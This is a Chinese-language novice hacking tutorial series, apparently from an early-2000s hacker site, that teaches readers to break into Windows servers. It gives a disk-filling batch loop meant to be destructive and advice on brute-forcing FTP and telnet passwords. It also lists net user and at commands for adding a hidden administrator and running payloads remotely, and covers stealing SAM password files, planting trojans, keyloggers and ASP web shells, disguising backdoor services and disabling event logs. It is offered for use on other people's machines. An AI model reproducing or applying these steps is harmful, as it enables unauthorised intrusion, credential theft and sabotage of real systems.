1,遇到长文件名怎么办?
c:program files
就用c:"program20%files"
2,遇到空格怎么办?
20%代替喽,或者xx yy=xxyy~1
3,如何做个很大的文件?
目的就是破坏啦!我不喜欢不过教教你们啦
@echo off
echo big > c:a.a
:h
copy c:a.a+c:a.a c:a.a
goto h
注意不要乱来啊!
4,输入命令,没反应或反应不对。
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
五,密码暴力破解
这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。 具体方法: 1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。 2,找到一台相应的主机。 3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来! 4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧^_^
大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。 这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的**运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧! 不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。 在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。 首先说说最简单的:system to admin 当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令: net user 察看用户表 net user username pass /add(添加密码为pass的用户username) net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组 net use \ipipc$ "password" /user:username 这是远程连接的命令 假如我们溢出了11.11.22.22,那么这样做吧! net user (看到了iusr_machinename的用户了,它一般没什么权限的) net user iusr_machinename cshu (把它的密码设为cshu) net localgroup administrators iusr_machinename /add(加入administrators组) 这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧! 熟悉一下net use 命令: net use \11.11.22.22ipc$ "cshu" /user:iusr_machinename 建立连接 copy c:haha.exe \11.11.22.22admin$ 把haha.exe 复制到机器c:winntsystem32上,若是c$.d$,就表示c,d盘 net time \11.11.22.22 看到了时间了,比如是8点 at \11.11.22.22 8:03 haha.exe 就会在8点3分执行。 net use \11.11.22.22 /delete 断开连接 应该是很简单的。
这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:) 是不是很简单?所以我是溢出是很厉害的攻击方法。 3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章) 总的来说,还是unicode的机器最多,为什么白痴网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。 首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。 1,如果我们可以对winnt epair和winntconfig进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpubwwwroot下,改成zip下载。 拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。
2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!
3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)
4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!
5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documents and settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.
6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。 总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)
想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。 那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧
这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们
今天说点什么呢?没有主题,乱谈一通吧! 首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。 我来说说我自己觉得最有用的几个项目:
1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。 remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我) remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的! remote ftp sam -x 拿sam的,还是用最好的lc3来解吧! frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!
(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点http://ip就可以了!(http://不要忘) 此外还有一点变通,大家肯定读的懂的。
2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。
3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧! 总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。
然后我想说说一些黑站的经验。 当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。 上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧! 推荐他的最大原因便是----便于隐藏!
一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:) 最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧) 我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧! 我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?
这样做是不是有品位多了? 要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令: net start termservice 启动win2k的终端控制 net start workstation 打开net use 功能 net start lanmanserver 打开ipc net start eventlog 启动日志(你不会那么傻吧!stop) net start schedule 打开计划(at) net start server 共享 还有很多,net命令里去找吧! 打开telnet
1,远程去运行ntlm.exe,流光里有
2,net stop telnet
3, net start telnet 我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的! 至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了! 代理问题。
我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。 具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。 做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦! 要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。
不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的…… 不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。 不要和被你黑的网管过多接触,前车之鉴哦。 对于一台好机器要做好后门,不要轻易失去它。 想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧! 实践是最好的教程,再次重申! 应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。 编程技术……好像太难了,不过再难也要学。 想不出来了………………
网友评论